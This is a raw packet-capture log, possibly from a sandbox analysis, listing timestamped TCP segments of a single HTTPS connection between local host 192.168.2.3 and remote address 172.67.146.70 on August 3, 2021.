Aug 3, 2021 23:42:10.196329117 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.196424007 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.196454048 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.196479082 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.196501017 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.196527958 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.196572065 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.196572065 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.196595907 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.196620941 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.196644068 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.196666002 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.196690083 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.196715117 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.196742058 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.196775913 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.196782112 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.196809053 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.196832895 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.196860075 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.196899891 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.196959019 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.196962118 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.196986914 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.197022915 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.197037935 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.197048903 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.197192907 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.197707891 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.197740078 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.197766066 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.197829962 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.197865963 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.197968960 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.198491096 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.199959993 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.199986935 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.199999094 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.200011015 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.200022936 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.201097965 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.201107979 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.201107979 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.201128006 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.201143026 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.201208115 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.201343060 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.441992998 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.442080975 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.442142963 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.442183018 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.442203999 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.442264080 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.442298889 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.442306995 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.442399025 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.442480087 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.442522049 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.442559958 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.442585945 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.442595005 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.442780018 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.443164110 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.443203926 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.443274975 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.443798065 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.443845987 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.443887949 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.443907976 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.443924904 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.444022894 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.444211006 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.447076082 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.447166920 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.447177887 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.447244883 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.447314978 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.447315931 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.447402000 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.447487116 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.447721004 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.447762966 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.447798967 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.447832108 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.447834015 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.447905064 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.448095083 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.448133945 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.448179007 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.448194027 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.448220015 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.448283911 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.448919058 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.448959112 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.448996067 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.449032068 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.449032068 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.449129105 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.449682951 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.449719906 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.449788094 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.450016022 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.450064898 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.450107098 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.450122118 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.450144053 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.450206995 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.450778008 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.450820923 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.450879097 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.450910091 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.450941086 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.451001883 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.698579073 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.698637009 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.698673964 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.698702097 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.698715925 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.698779106 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.698823929 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.698884964 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.698924065 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.698946953 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.698962927 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.699014902 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.699640989 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.699680090 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.699728012 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.699734926 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.699774027 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.699837923 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.700428009 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.700467110 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.700505972 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.700521946 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.700545073 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.700596094 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.701225996 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.701267004 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.701304913 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.701334000 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.701349974 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.701400042 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.701807022 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.701843023 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.701888084 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.701917887 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.701929092 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.701987028 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.702599049 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.702636957 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.702673912 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.702693939 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.702709913 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.702776909 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.703387022 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.703428030 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.703464985 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.703485966 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.703496933 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.703550100 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.704549074 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.704588890 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.704623938 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.704643965 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.704653025 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.704700947 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.704829931 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.704865932 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.704912901 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.704911947 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.704955101 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.705001116 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.705701113 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.705734968 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.705785036 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.950977087 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.951004028 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.951065063 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.951107025 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.951150894 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.951200962 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.951231956 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.951257944 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.951261997 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.951299906 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.951313972 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.951364040 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.951988935 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.952025890 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.952063084 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.952094078 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.952100039 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.952136993 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.952168941 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.952785969 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.952857971 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.953537941 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.953579903 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.953615904 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.953654051 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.953656912 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.953720093 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.953852892 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.953891993 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.953927994 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.953962088 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.953965902 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.954035044 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.954643011 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.954679012 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.954726934 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.954757929 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.954767942 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.954843044 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.956624031 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.956671953 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.956712008 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.956788063 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.956968069 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.957015991 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.957058907 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.957087040 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.957114935 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.957137108 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.957149982 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.957154036 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.957182884 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.957216978 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.957220078 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.957252026 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.957257032 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.957314968 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.957458019 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.957499027 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.957535028 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.957560062 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.957570076 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.957608938 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.957624912 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.958287954 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.958359003 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.959186077 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.959214926 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.959287882 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.203212023 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.203283072 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.203397036 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.203458071 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.203532934 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.203582048 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.203583956 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.203636885 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.203689098 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.203691006 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.203738928 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.203773975 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.203851938 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.204009056 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.204040051 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.204093933 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.204777956 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.204832077 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.204864979 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.204891920 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.204925060 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.204960108 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.205125093 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.205159903 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.205198050 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.206125975 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.206170082 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.206217051 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.206231117 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.206269979 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.206298113 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.206420898 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.206451893 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.206489086 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.206983089 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.207035065 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.207076073 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.207093954 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.207168102 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.207230091 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.207324028 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.207380056 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.207401037 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.210187912 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.210232019 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.210280895 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.210288048 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.210334063 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.210335970 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.210376978 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.210439920 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.210658073 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.210700035 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.210743904 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.210768938 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.210773945 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.210819960 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.210838079 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.211600065 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.211639881 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.211668968 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.211708069 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.211755037 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.212016106 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.212060928 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.212099075 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.212131023 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.212522984 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.212570906 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.212593079 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.212614059 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.212656021 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.212671995 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.212688923 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.212750912 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.213335991 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.213376999 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.213402033 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.213449001 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.253770113 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.457680941 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.457739115 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.457814932 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.457817078 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.457878113 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.457930088 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.457952023 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.457990885 CEST	443	49712	172.67.146.70	192.168.2.3
